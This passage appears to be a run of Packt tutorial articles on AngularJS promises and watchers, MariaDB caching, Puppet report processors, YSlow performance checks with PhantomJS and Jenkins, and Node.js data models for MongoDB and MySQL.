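The same deferred pattern can be sketched with native JavaScript promises. This is a minimal stand-in for the $q/$http pair, not AngularJS itself; fetchData is a hypothetical function simulating an HTTP request:

```javascript
// Minimal sketch of the promise pattern that $q provides, using native
// JavaScript promises. fetchData is a hypothetical stand-in for $http.get.
function fetchData(url) {
  // Simulate an asynchronous request that resolves with a response object.
  return Promise.resolve({ data: [{ id: 1, name: 'Nexus S' }] });
}

function getPhones() {
  // Chain on the request and unwrap the payload, mirroring the
  // request.then(success, error) shape used with $q.
  return fetchData('phones.json').then(
    function(response) { return response.data; },
    function(errorResponse) { return errorResponse; }
  );
}

// The caller reads the data in a synchronous-looking flow.
getPhones().then(function(phones) {
  console.log(phones.length);
});
```

The success and error callbacks mirror the two-argument form of then, so the calling code never has to know whether the data arrived or an error object was substituted.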
The benefits of using this object are immense when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread-blocking by nature. This means that we can now successfully write our application's logic in a way that follows a synchronous flow.

ES6 (ECMAScript 6) incorporates promises at its core. This will eventually alleviate the need for many functions inside the $q library, or the entire library itself, in AngularJS 2.0.

The core AngularJS service that is related to CRUD operations is called $http. This service uses the $q library internally to allow the powers of promises to be used anywhere a data request is made. Here is an example of a service that uses the $q object in order to create an easy way to resolve data in a controller. Refer to the following code:

```javascript
this.getPhones = function() {
  var request = $http.get('phones.json'),
      promise;
  promise = request.then(function(response) {
    return response.data;
  }, function(errorResponse) {
    return errorResponse;
  });
  return promise;
};
```

Here, we can see that the phoneService function uses the $http service to request all the phones. The phoneService function creates a new request object and calls its then function, which returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned.

This service is best showcased when used in conjunction with a resolve function that feeds data into a controller. The resolve function will accept the promise object being returned and will only allow the controller to be executed once all of the phones have been resolved or rejected. The rest of the code that is needed for this example is the application's configuration code. The config process is executed on the initialization of the application.
This is where the resolve function is supposed to be implemented. Refer to the following code:

```javascript
var app = angular.module('angularjs-promise-example', ['ngRoute']);

app.config(function($routeProvider) {
  $routeProvider.when('/', {
    controller: 'PhoneListCtrl',
    templateUrl: 'phoneList.tpl.html',
    resolve: {
      phones: function(phoneService) {
        return phoneService.getPhones();
      }
    }
  }).otherwise({ redirectTo: '/' });
});

app.controller('PhoneListCtrl', function($scope, phones) {
  $scope.phones = phones;
});
```

A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview.

Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller will still be in charge of driving the data that is sitting inside the template view. This is why it is important for directives to know what to do when their data changes.

How should data be watched for changes?

Most directives are on a need-to-know basis about the details of how they receive the data that is in charge of their view. This is a separation of logic that reduces cyclomatic complexity in an application. The controllers should be in charge of requesting data and passing this data to directives through their associated $scope object. Directives should be in charge of creating DOM based on what data they receive and when the data changes.

There are an infinite number of possibilities that a directive can try to achieve once it receives its data. Our goal is to showcase how to watch live data for changes and how to make sure that this works at scale, so that our directives have the opportunity to fulfill their specific tasks. There are three built-in ways to watch data in AngularJS.
Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program:

- Watching an object's identity for changes
- Recursively watching all of the object's properties for changes
- Watching just the top level of an object's properties for changes

Each of these methods has its own specific purpose. The first method can be used if the variable being watched is a primitive type. The second method is used for deep comparisons between objects. The third is used to do a shallow watch on an array of any type or on a normal object.

Let's look at an example that shows the last two watcher types. This example is going to use jsPerf to showcase our logic. We are leaving the first watcher out because it only watches primitive types, and we will be watching many objects for different levels of equality.

This example sets the $scope variable in the app's run function because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code:

```javascript
app.run(function($rootScope) {
  $rootScope.data = [
    {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle': false},
    {'bob': true}, {'bob': true}, {'frank': false}, {'jerry': 'hey'},
    {'bargle': false}, {'bob': true}, {'bob': true}, {'frank': false}
  ];
});
```

This run function sets up the data object that we will watch for changes. This will be constant throughout every test we run and will reset back to this form at the beginning of each test.

Doing a deep watch on $rootScope.data

This watch function will do a deep watch on the data object. The true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary.
Refer to the following code:

```javascript
app.service('Watch', function($rootScope) {
  return {
    run: function() {
      $rootScope.$watch('data', function(newVal, oldVal) {
      }, true);
      // The digest is here because of the jsPerf test. We are using this
      // run function to mimic a real environment.
      $rootScope.$digest();
    }
  };
});
```

Doing a shallow watch on $rootScope.data

The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code:

```javascript
app.service('WatchCollection', function($rootScope) {
  return {
    run: function() {
      $rootScope.$watchCollection('data', function(n, o) {
      });
      $rootScope.$digest();
    }
  };
});
```

During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object to the data array, which fires the watch's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where it is acceptable to shallow watch an object. The example can be found at http://jsperf.com/watchcollection-vs-watch/5. Refer to the following screenshot:

This test implies that the watchCollection function is a better choice for watching an array of objects that can be shallow watched for changes. This test also holds for an array of strings, integers, or floats. This brings up more interesting points, such as the following:

- Does our directive depend on a deep watch of the data?
- Do we want to use the $watch function, even though it is slow and memory taxing?
- Is it possible to use the $watch function if we are using large data objects?

The directives that have been used in this book have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets.
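The cost difference between the two watch types can be sketched in plain JavaScript. These are hypothetical helpers illustrating the comparison strategies, not AngularJS internals:

```javascript
// Hypothetical helpers illustrating the two comparison strategies.

// A deep watch must compare every nested property on every digest;
// serializing both values makes that total-traversal cost explicit.
function deepChanged(oldVal, newVal) {
  return JSON.stringify(oldVal) !== JSON.stringify(newVal);
}

// A collection (shallow) watch only compares length and top-level
// references, so it never descends into the objects themselves.
function shallowChanged(oldArr, newArr) {
  if (oldArr.length !== newArr.length) return true;
  for (var i = 0; i < oldArr.length; i++) {
    if (oldArr[i] !== newArr[i]) return true;
  }
  return false;
}

var item = { bob: true };
var unchanged = shallowChanged([item], [item]);   // same references: false
var replaced = shallowChanged([item], [{ bob: true }]); // new reference: true
```

Because the shallow check stops at reference equality, it is a single O(n) pass over the array rather than a walk of every nested property, which is why a collection watch scales better on large data sets.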
Directives can be in charge

There are some libraries that believe that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes that have been covered so far in this article, when thinking about what directives are meant for and how they should receive data. Let's come up with an actual use case that could possibly allow this type of behavior.

Let's consider a page that has many widgets on it. A widget is a directive that needs a set of large data objects to render its view. To be more specific, let's say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a very clean, simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application?

One option is to not use the controller to resolve the Big Data and inject it into a directive, but rather to use the controller to request directive configurations that tell the directive to request certain data objects. Some people would say this goes against normal conventions, but I say it's necessary when dealing with many widgets in the same view, which individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets.

To create this in a real-life example, let's take the phoneService function, which was created earlier, and add a new method to it called getPhone. Refer to the following code:

```javascript
this.getPhone = function(config) {
  return $http.get(config.url);
};
```

Now, instead of requesting all the details on the initial call, the original getPhones method only needs to return phone objects with a name and id value.
This will allow the application to request the details on demand. To do this, we do not need to alter the getPhones method that was created earlier. We only need to alter the data that is supplied when the request is made. It should be noted that any directive that requests data should be tested to prove that it is requesting the correct data at the right time.

Testing directives that control data

Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases, it is necessary that directives and XHR logic be used together. When these use cases reveal themselves in production, it is important to test them properly.

The tests in the book use two very generic steps to prove business logic. These steps are as follows:

- Create, compile, and link DOM to the AngularJS digest cycle
- Test scope variables and DOM interactions for correct outputs

Now, we will add one more step to the process. This step will lie in the middle of the two steps. The new step is as follows:

- Make sure all data communication is fired correctly

AngularJS makes it very simple to add additional resource-related logic. This is because it has a built-in backend service mock, which allows many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
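To make the idea concrete, here is a toy stand-in that mimics the expect-and-flush behavior of such a backend mock in plain JavaScript. This is a conceptual sketch of the pattern, not the real angular-mocks implementation or API:

```javascript
// Toy version of the backend-mock idea: record expected requests up front,
// hold real requests in a queue, and only answer them when flush() is
// called. createFakeBackend is a hypothetical helper for illustration.
function createFakeBackend() {
  var expectations = [];
  var pending = [];
  return {
    expectGET: function(url, responseData) {
      expectations.push({ url: url, data: responseData });
    },
    get: function(url, callback) {
      pending.push({ url: url, callback: callback });
    },
    flush: function() {
      while (pending.length > 0) {
        var request = pending.shift();
        var expected = expectations.shift();
        if (!expected || expected.url !== request.url) {
          throw new Error('Unexpected GET ' + request.url);
        }
        request.callback(expected.data);
      }
    }
  };
}

// A test can now assert that the code under test fired the right request.
var backend = createFakeBackend();
backend.expectGET('phones.json', [{ id: 1 }]);

var phones;
backend.get('phones.json', function(data) { phones = data; });
backend.flush(); // responses are delivered only here, keeping tests deterministic
```

Holding responses until flush is what makes this style of test deterministic: the test controls exactly when "network" data arrives, and any request that was never declared with an expectation fails loudly.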
Building a Web Application with PHP and MariaDB - Introduction to caching

Packt
11 Jun 2014
4 min read
Let's begin with database caching. All the data for our application is stored in MariaDB. When a request is made to retrieve the list of available students, we run a query on our course_registry database. Running a single query at a time is simple, but as the application gets popular, we will have more concurrent users. As the number of concurrent connections to the database increases, we will have to make sure that our database server is optimized to handle that load. In this section, we will look at the different types of caching that can be performed in the database.

Let's start with query caching. Query caching is available by default on MariaDB; to verify that the installation has a query cache, we will use the have_query_cache global variable. Let's use the SHOW VARIABLES command to verify that the query cache is available on our MariaDB installation, as shown in the following screenshot:

Now that we have a query cache, let's verify that it is active. To do this, we will use the query_cache_type global variable, shown as follows:

From this query, we can verify that the query cache is turned on. Now, let's take a look at the memory that is allocated for the query cache by using the query_cache_size command, shown as follows:

The query cache size is currently set to 64 MB; let's modify our query cache size to 128 MB. The following screenshot shows the usage of the SET GLOBAL syntax:

We use the SET GLOBAL syntax to set the value for the query_cache_size command, and we verify this by reloading the value of the query_cache_size command. Now that we have the query cache turned on and working, let's look at a few statistics that will give us an idea of how often the queries are being cached. To retrieve this information, we will query the Qcache variable, as shown in the following screenshot:

From this output, we can see that we are retrieving a lot of statistics about the query cache.
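Since the screenshots are not reproduced here, the statements they illustrate follow this general pattern. The variable names are standard MariaDB; the values in the comments are the examples discussed in the text, and actual output will vary by server:

```sql
-- Check that the query cache is compiled in and active
SHOW VARIABLES LIKE 'have_query_cache';   -- YES
SHOW VARIABLES LIKE 'query_cache_type';   -- ON

-- Inspect the cache size and raise it from 64 MB to 128 MB
SHOW VARIABLES LIKE 'query_cache_size';
SET GLOBAL query_cache_size = 128 * 1024 * 1024;

-- Query cache statistics (Qcache_hits, Qcache_not_cached,
-- Qcache_lowmem_prunes, and so on)
SHOW STATUS LIKE 'Qcache%';
```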
One thing to verify is the Qcache_not_cached variable, which is high for our database. This is due to the use of prepared statements; prepared statements are not cached by MariaDB. Another important variable to keep an eye on is Qcache_lowmem_prunes, which gives us an idea of the number of queries that were deleted due to low memory; a growing value indicates that the query cache size has to be increased. From these stats, we understand that as long as we use prepared statements, our queries will not be cached on the database server. So, we should use a combination of prepared statements and raw SQL statements, depending on our use cases.

Now that we understand a good bit about query caches, let's look at the other caches that MariaDB provides, such as the table open cache, the join buffer cache, and the MEMORY storage engine. The table open cache allows us to define the number of tables that can be left open by the server to allow faster look-ups. This is very helpful when there is a huge number of requests for a table, as the table need not be opened for every request. The join buffer cache is commonly used for queries that perform a full join, wherein there are no indexes to be used for finding rows for the next table. Normally, indexes help us avoid these problems. The MEMORY storage engine, previously known as the HEAP engine, is commonly used for read-only caches of data from other tables or for temporary work areas. Let's look at the variables that are available with MariaDB, as shown in the following screenshot:

Database caching is a very important step towards making our application scalable. However, it is important to understand when to cache, the correct caching techniques, and the size for each cache. Allocation of memory for caching has to be done very carefully, as the application can run out of memory if too much space is allocated.
A good method to allocate memory for caching is to run benchmarks to see how the queries perform, and to keep a list of popular queries that run often, so that we can begin by caching and optimizing the database for those queries. Now that we have a good understanding of database caching, let's proceed to application-level caching.

Resources for Article:
Introduction to Kohana PHP Framework
Creating and Consuming Web Services in CakePHP 1.3
Installing MariaDB on Windows and Mac OS X

The anatomy of a report processor

Packt
11 Jun 2014
6 min read
(For more resources related to this topic, see here.) At its most basic, a Puppet report processor is a piece of Ruby code that is triggered every time a Puppet agent passes a report to the Puppet master. This piece of code is passed a Ruby object that contains both the client report and metrics. Although the data is sent in a wire format, such as YAML or PSON, by the time a report processor is triggered, this data has been turned into an object by Puppet. This code can simply produce reports, but we're not limited to that. With a little imagination, we can use Puppet report processors for everything from alerts through to the orchestration of events. For instance, using a report processor and a suitable SMS provider would make it easy for Puppet to send you an SMS alert every time a run fails; alternatively, using a report processor, you could analyze the data to reveal trends in your changes and update a change management console. The best way to think of a report processor is as a means to trigger actions on the event of a change, rather than strictly a reporting tool. Puppet reports are written in plain old Ruby, and so you have access to the multitude of libraries available via the RubyGems repositories. This can make developing your plugins relatively simple, as half the time you will find that the heavy lifting has been done for you by some enterprising fellow who has already solved your problem and published his code in a gem. Good examples of this can be found if you need to interoperate with another product such as MySQL, Oracle, Salesforce, and so on. A brief search on the Internet will bring up three or four examples of libraries that offer this functionality within a few lines of code. Not having to produce the plumbing of a solution will both save time and generally produce fewer bugs.

Creating a basic report processor

Let's take a look at an incredibly simple report processor example.
In the event that a Puppet agent fails to run, the following code will take the incoming data and create a little text file with a short message detailing which host had the problem:

require 'puppet'

Puppet::Reports::register_report(:myfirstreport) do
  desc "My very first report!"

  def process
    if self.status == 'failed'
      msg = "failed puppet run for #{self.host} #{self.status}"
      File.open('/tmp/puppetpanic.txt', 'w') { |f| f.write(msg) }
    end
  end
end

Although this code is basic, it contains all of the components required for a report processor. The first line includes the only mandatory library required: the Puppet library. This gives us access to several important methods that allow us to register and describe our report processor, and finally, a method to allow us to process our data.

Registering your report processor

The first method that every report processor must call is the Puppet::Reports::register_report method. This method takes only one argument, which is the name of the report processor. This name should be passed as a symbol and an alphanumeric title that starts with a letter (:report3 would be fine, but :3reports would not be). Try to avoid using any other characters—although you can potentially use underscores, the documentation is rather discouragingly vague on how valid this is and could well cause issues.

Describing your report processor

After we've called the Puppet::Reports::register_report method, we then need to call the desc method. The desc method is used to provide some brief documentation for what the report processor does, and allows the use of Markdown formatting in the string.

Processing your report

The last method that every report processor must include is the process method. The process method is where we actually take our Puppet data and process it, and to make working with the report data easier, you have access to the self object within the process method.
The self object is a Puppet::Transaction::Report object and gives you access to the Puppet report data. For example, to extract the hostname of the reporting host, we can use self.host. You can find the full details of what is contained in the Puppet::Transaction::Report object by visiting http://docs.puppetlabs.com/puppet/latest/reference/format_report.html. Let's go through our small example in detail and look at what it's doing. First of all, we include the Puppet library to ensure that we have access to the required methods. We then register our report by calling the Puppet::Reports::register_report(:myfirstreport) method, passing it the name of myfirstreport. Next, we add our desc method to tell users what this report is for. Finally, we have the process method, which is where we place our code to process the report. For this example, we're going to keep it simple and check whether the Puppet agent reported a successful run or not, and we do this by checking the Puppet status. This is described in the following code snippet:

if self.status == 'failed'
  msg = "failed puppet run for #{self.host} #{self.status}"

The transaction can produce one of three states: failed, changed, or unchanged. This is straightforward; a failed client run is any run that contains a resource that has a status of failed, a changed state is triggered when the client run contains a resource that has been given a status of changed, and the unchanged state occurs when a resource contains a value of out_of_sync; this generally happens if you run the Puppet client in noop (simulation) mode. Finally, we actually do something with the data. In the case of this very simple application, we're going to place the warning into a plain text file in the /tmp directory.
This is described in the following code snippet: msg = "failed puppet run for #{self.host}" File.open('/tmp/puppetpanic.txt', 'w') { | f | f.write(msg)} As you can see, we're using basic string interpolation to take some of our report data and place it into the message. This is then written into a simple plain text file in the /tmp directory. Summary In this article, we have seen the anatomy of a report processor. We have also seen a basic Ruby code that sets up a simple report processor. Resources for Article: Further resources on this subject: Puppet: Integrating External Tools [Article] Quick start – Using the core Puppet resource types [Article] External Tools and the Puppet Ecosystem [Article]

Automating performance analysis with YSlow and PhantomJS

Packt
10 Jun 2014
12 min read
(For more resources related to this topic, see here.)

Getting ready

To run the examples in this article, the phantomjs binary will need to be accessible to the continuous integration server, which may not necessarily share the same permissions or PATH as our user. We will also need a target URL. We will use the PhantomJS port of the YSlow library to execute the performance analysis on our target web page. The YSlow library must be installed somewhere on the filesystem that is accessible to the continuous integration server. For our example, we have placed the yslow.js script in the tmp directory of the jenkins user's home directory. To find the jenkins user's home directory on a POSIX-compatible system, first switch to that user using the following command:

sudo su - jenkins

Then print the home directory to the console using the following command:

echo $HOME

We will need to have a continuous integration server set up where we can configure the jobs that will execute our automated performance analyses. The example that follows will use the open source Jenkins CI server. Jenkins CI is too large a subject to introduce here, but this article does not assume any working knowledge of it. For information about Jenkins CI, including basic installation or usage instructions, or to obtain a copy for your platform, visit the project website at http://jenkins-ci.org/. Our example uses version 1.552. The combination of PhantomJS and YSlow is in no way unique to Jenkins CI; the example aims to provide a clear illustration of automated performance testing that can easily be adapted to any number of continuous integration server environments. The article also uses several plugins on Jenkins CI to help facilitate our automated testing. These plugins include:

Environment Injector Plugin
JUnit Attachments Plugin
TAP Plugin
xUnit Plugin

To run that demo site, we must have Node.js installed.
In a separate terminal, change to the phantomjs-sandbox directory (in the sample code's directory), and start the app with the following command:

node app.js

How to do it…

To execute our automated performance analyses in Jenkins CI, the first thing that we need to do is set up the job as follows:

1. Select the New Item link in Jenkins CI.
2. Give the new job a name (for example, YSlow Performance Analysis), select Build a free-style software project, and then click on OK.
3. To ensure that the performance analyses are automated, we enter a Build Trigger for the job. Check off the appropriate Build Trigger and enter details about it. For example, to run the tests every two hours, during business hours, Monday through Friday, check Build periodically and enter the Schedule as H 9-16/2 * * 1-5.
4. In the Build block, click on Add build step and then click on Execute shell.
5. In the Command text area of the Execute Shell block, enter the shell commands that we would normally type at the command line, for example:

phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f junit http://localhost:3000/css-demo > yslow.xml

6. In the Post-build Actions block, click on Add post-build action and then click on Publish JUnit test result report.
7. In the Test report XMLs field of the Publish JUnit Test Result Report block, enter *.xml.
8. Lastly, click on Save to persist the changes to this job.

Our performance analysis job should now run automatically according to the specified schedule; however, we can always trigger it manually by navigating to the job in Jenkins CI and clicking on Build Now. After a few of the performance analyses have completed, we can navigate to those jobs in Jenkins CI and see the results shown in the following screenshots:

The landing page for a performance analysis project in Jenkins CI

Note the Test Result Trend graph with the successes and failures.
The Test Result report page for a specific build Note that the failed tests in the overall analysis are called out and that we can expand specific items to view their details. The All Tests view of the Test Result report page for a specific build Note that all tests in the performance analysis are listed here, regardless of whether they passed or failed, and that we can click into a specific test to view its details. How it works… The driving principle behind this article is that we want our continuous integration server to periodically and automatically execute the YSlow analyses for us so that we can monitor our website's performance over time. This way, we can see whether our changes are having an effect on overall site performance, receive alerts when performance declines, or even fail builds if we fall below our performance threshold. The first thing that we do in this article is set up the build job. In our example, we set up a new job that was dedicated to the YSlow performance analysis task. However, these steps could be adapted such that the performance analysis task is added onto an existing multipurpose job. Next, we configured when our job will run, adding Build Trigger to run the analyses according to a schedule. For our schedule, we selected H 9-16/2 * * 1-5, which runs the analyses every two hours, during business hours, on weekdays. While the schedule that we used is fine for demonstration purposes, we should carefully consider the needs of our project—chances are that a different Build Trigger will be more appropriate. For example, it may make more sense to select Build after other projects are built, and to have the performance analyses run only after the new code has been committed, built, and deployed to the appropriate QA or staging environment. Another alternative would be to select Poll SCM and to have the performance analyses run only after Jenkins CI detects new changes in source control. 
With the schedule configured, we can apply the shell commands necessary for the performance analyses. As noted earlier, the Command text area accepts the text that we would normally type on the command line. Here we type the following: phantomjs: This is for the PhantomJS executable binary ${HOME}/tmp/yslow.js: This is to refer to the copy of the YSlow library accessible to the Jenkins CI user -i grade: This is to indicate that we want the "Grade" level of report detail -threshold "B": This is to indicate that we want to fail builds with an overall grade of "B" or below -f junit: This is to indicate that we want the results output in the JUnit format http://localhost:3000/css-demo: This is typed in as our target URL > yslow.xml: This is to redirect the JUnit-formatted output to that file on the disk What if PhantomJS isn't on the PATH for the Jenkins CI user? A relatively common problem that we may experience is that, although we have permission on Jenkins CI to set up new build jobs, we are not the server administrator. It is likely that PhantomJS is available on the same machine where Jenkins CI is running, but the jenkins user simply does not have the phantomjs binary on its PATH. In these cases, we should work with the person administering the Jenkins CI server to learn its path. Once we have the PhantomJS path, we can do the following: click on Add build step and then on Inject environment variables; drag-and-drop the Inject environment variables block to ensure that it is above our Execute shell block; in the Properties Content text area, apply the PhantomJS binary's path to the PATH variable, as we would in any other script as follows: PATH=/path/to/phantomjs/bin:${PATH} After setting the shell commands to execute, we jump into the Post-build Actions block and instruct Jenkins CI where it can find the JUnit XML reports. 
As our shell command is redirecting the output into a file that is directly in the workspace, it is sufficient to enter an unqualified *.xml here. Once we have saved our build job in Jenkins CI, the performance analyses can begin right away! If we are impatient for our first round of results, we can click on Build Now for our job and watch as it executes the initial performance analysis. As the performance analyses are run, Jenkins CI will accumulate the results on the filesystem, keeping them until they are either manually removed or until a discard policy removes old build information. We can browse these accumulated jobs in the web UI for Jenkins CI, clicking on the Test Result link to drill into them. There's more… The first thing that bears expanding upon is that we should be thoughtful about what we use as the target URL for our performance analysis job. The YSlow library expects a single target URL, and as such, it is not prepared to handle a performance analysis job that is otherwise configured to target two or more URLs. As such, we must select a strategy to compensate for this, for example: Pick a representative page: We could manually go through our site and select the single page that we feel best represents the site as a whole. For example, we could pick the page that is "most average" compared to the other pages ("most will perform at about this level"), or the page that is most likely to be the "worst performing" page ("most pages will perform better than this"). With our representative page selected, we can then extrapolate performance for other pages from this specimen. Pick a critical page: We could manually select the single page that is most sensitive to performance. For example, we could pick our site's landing page (for example, "it is critical to optimize performance for first-time visitors"), or a product demo page (for example, "this is where conversions happen, so this is where performance needs to be best"). 
Again, with our performance-sensitive page selected, we can optimize the general cases around the specific one. Set up multiple performance analysis jobs: If we are not content to extrapolate site performance from a single specimen page, then we could set up multiple performance analysis jobs—one for each page on the site that we want to test. In this way, we could (conceivably) set up an exhaustive performance analysis suite. Unfortunately, the results will not roll up into one; however, once our site is properly tuned, we need to only look for the telltale red ball of a failed build in Jenkins CI. The second point worth considering is—where do we point PhantomJS and YSlow for the performance analysis? And how does the target URL's environment affect our interpretation of the results? If we are comfortable running our performance analysis against our production deploys, then there is not much else to discuss—we are assessing exactly what needs to be assessed. But if we are analyzing performance in production, then it's already too late—the slow code has already been deployed! If we have a QA or staging environment available to us, then this is potentially better; we can deploy new code to one of these environments for integration and performance testing before putting it in front of the customers. However, these environments are likely to be different from production despite our best efforts. For example, though we may be "doing everything else right", perhaps our staging server causes all traffic to come back from a single hostname, and thus, we cannot properly mimic a CDN, nor can we use cookie-free domains. Do we lower our threshold grade? Do we deactivate or ignore these rules? How can we tell apart the false negatives from the real warnings? We should put some careful thought into this—but don't be disheartened—better to have results that are slightly off than to have no results at all! 
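Because the job leaves YSlow's JUnit-formatted output on disk, it is also easy to post-process outside Jenkins CI, for example to feed a dashboard or a chat notification. The following sketch, in Python for brevity, counts failing rules in a JUnit-style file using only the standard library; the element names (testsuite, testcase, failure) follow the common JUnit XML convention, and the sample document here is invented for illustration rather than copied from real YSlow output:

```python
import xml.etree.ElementTree as ET

# An invented JUnit-style document standing in for yslow.xml.
SAMPLE = """<testsuite name="yslow" tests="3" failures="1">
  <testcase name="ynumreq"/>
  <testcase name="ycdn">
    <failure message="Grade F on Use a Content Delivery Network"/>
  </testcase>
  <testcase name="yexpires"/>
</testsuite>"""

def failing_rules(junit_xml):
    """Return the names of test cases that contain a <failure> element."""
    root = ET.fromstring(junit_xml)
    return [case.get("name")
            for case in root.iter("testcase")
            if case.find("failure") is not None]

print(failing_rules(SAMPLE))  # ['ycdn']
```

A small script like this could run as an extra build step after the analysis, turning the raw XML into whatever summary our team actually reads.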
Using TAP format

If JUnit-formatted results turn out to be unacceptable, there is also a TAP plugin for Jenkins CI. Test Anything Protocol (TAP) is a plain text-based report format that is relatively easy for both humans and machines to read. With the TAP plugin installed in Jenkins CI, we can easily configure our performance analysis job to use it. We would just make the following changes to our build job:

In the Command text area of our Execute shell block, we would enter the following command:

phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f tap http://localhost:3000/css-demo > yslow.tap

In the Post-build Actions block, we would select Publish TAP Results instead of Publish JUnit test result report and enter yslow.tap in the Test results text field.

Everything else about using TAP instead of JUnit-formatted results is basically the same. The job will still run on the schedule we specify, Jenkins CI will still accumulate test results for comparison, and we can still explore the details of an individual test's outcomes. The TAP plugin adds an additional link in the job for us, TAP Extended Test Results, as shown in the following screenshot:

One thing worth pointing out about using TAP results is that it is much easier to set up a single job to test multiple target URLs within a single website. We can enter multiple tests in the Execute shell block (separating them with the && operator) and then set our Test Results target to be *.tap. This will conveniently combine the results of all our performance analyses into one.

Summary

In this article, we saw how to set up an automated performance analysis task on a continuous integration server (for example, Jenkins CI) using PhantomJS and the YSlow library.

Resources for Article:
Further resources on this subject:
Getting Started [article]
Introducing a feature of IntroJs [article]
So, what is Node.js? [article]

Selecting and initializing the database

Packt
10 Jun 2014
7 min read
(For more resources related to this topic, see here.) In other words, it's simpler than a SQL database, and very often stores information in a key-value form. Usually, such solutions are used when handling and storing large amounts of data. It is also a very popular approach when we need a flexible schema or when we want to use JSON. It really depends on what kind of system we are building. In some cases, MySQL could be a better choice, while in some other cases, MongoDB. In our example blog, we're going to use both. In order to do this, we will need a layer that connects to the database server and accepts queries. To make things a bit more interesting, we will create a module that has only one API, but can switch between the two database models.

Using NoSQL with MongoDB

Let's start with MongoDB. Before we start storing information, we need a MongoDB server running. It can be downloaded from the official page of the database, https://www.mongodb.org/downloads. We are not going to handle the communication with the database manually; there is a driver specifically developed for Node.js. It's called mongodb and we should include it in our package.json file. After successful installation via npm install, the driver will be available in our scripts. We can check this as follows: "dependencies": { "mongodb": "1.3.20" } We will stick to the Model-View-Controller architecture and keep the database-related operations in a model called Articles. We can see this as follows: var crypto = require("crypto"), type = "mongodb", client = require('mongodb').MongoClient, mongodb_host = "127.0.0.1", mongodb_port = "27017", collection; module.exports = function() { if(type == "mongodb") { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { ... }, remove: function(id, callback) { ... } } } else { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { ...
}, remove: function(id, callback) { ... } } } } It starts with defining a few dependencies and settings for the MongoDB connection. Line number one requires the crypto module. We will use it to generate unique IDs for every article. The type variable defines which database is currently accessed. The third line initializes the MongoDB driver. We will use it to communicate with the database server. After that, we set the host and port for the connection and at the end a global collection variable, which will keep a reference to the collection with the articles. In MongoDB, the collections are similar to the tables in MySQL. The next logical step is to establish a database connection and perform the needed operations, as follows: connection = 'mongodb://'; connection += mongodb_host + ':' + mongodb_port; connection += '/blog-application'; client.connect(connection, function(err, database) { if(err) { throw new Error("Can't connect"); } else { console.log("Connection to MongoDB server successful."); collection = database.collection('articles'); } }); We pass the host and the port, and the driver is doing everything else. Of course, it is a good practice to handle the error (if any) and throw an exception. In our case, this is especially needed because without the information in the database, the frontend has nothing to show. 
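The pattern at work here, a single factory that returns the same add/update/get/remove interface regardless of which backend is selected, is language-agnostic. Here is a minimal sketch of the same idea in Python (the in-memory backend and all names are illustrative stand-ins, not part of the article's code):

```python
import uuid

class MemoryBackend:
    """Stand-in backend exposing the same interface as the article's models."""
    def __init__(self):
        self._rows = {}

    def add(self, data):
        # Mirror the article's approach: generate a unique id per record.
        data["id"] = uuid.uuid4().hex
        self._rows[data["id"]] = data
        return data["id"]

    def update(self, data):
        self._rows[data["id"]].update(data)

    def get(self):
        return list(self._rows.values())

    def remove(self, record_id):
        del self._rows[record_id]

def make_model(backend_type="memory"):
    # In the article this switch would pick MongoDB or MySQL; here there
    # is only the illustrative in-memory variant.
    backends = {"memory": MemoryBackend}
    return backends[backend_type]()

model = make_model("memory")
article_id = model.add({"title": "Hello", "text": "First post"})
print(len(model.get()))  # 1
```

The calling code never needs to know which backend is active, which is exactly why the two JavaScript implementations must keep the same method names and arguments.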
The rest of the module contains methods to add, edit, retrieve, and delete records: return { add: function(data, callback) { var date = new Date(); data.id = crypto.randomBytes(20).toString('hex'); data.date = date.getFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate(); collection.insert(data, {}, callback || function() {}); }, update: function(data, callback) { collection.update( {id: data.id}, data, {}, callback || function(){ } ); }, get: function(callback) { collection.find({}).toArray(callback); }, remove: function(id, callback) { collection.findAndModify( {id: id}, [], {}, {remove: true}, callback ); } } Note that getMonth returns a zero-based month, so we add 1 to it, and that the queries match on the id field, which is the same field we set in the add method. The add and update methods accept the data parameter. That's a simple JavaScript object. For example, see the following code: { title: "Blog post title", text: "Article's text here ..." } The records are identified by an automatically generated unique id. The update method needs it in order to find out which record to edit. All the methods also have a callback. That's important, because the module is meant to be used as a black box, that is, we should be able to create an instance of it, operate with the data, and at the end continue with the rest of the application's logic.

Using MySQL

We're going to use an SQL type of database with MySQL. We will add a few more lines of code to the already working Articles.js model. The idea is to have a class that supports the two databases as two different options. At the end, we should be able to switch from one to the other by simply changing the value of a variable. Similar to MongoDB, we need to first install the database to be able to use it. The official download page is http://www.mysql.com/downloads. MySQL requires another Node.js module. It should be added again to the package.json file. We can see the module as follows: "dependencies": { "mongodb": "1.3.20", "mysql": "2.0.0" } Similar to the MongoDB solution, we first need to connect to the server.
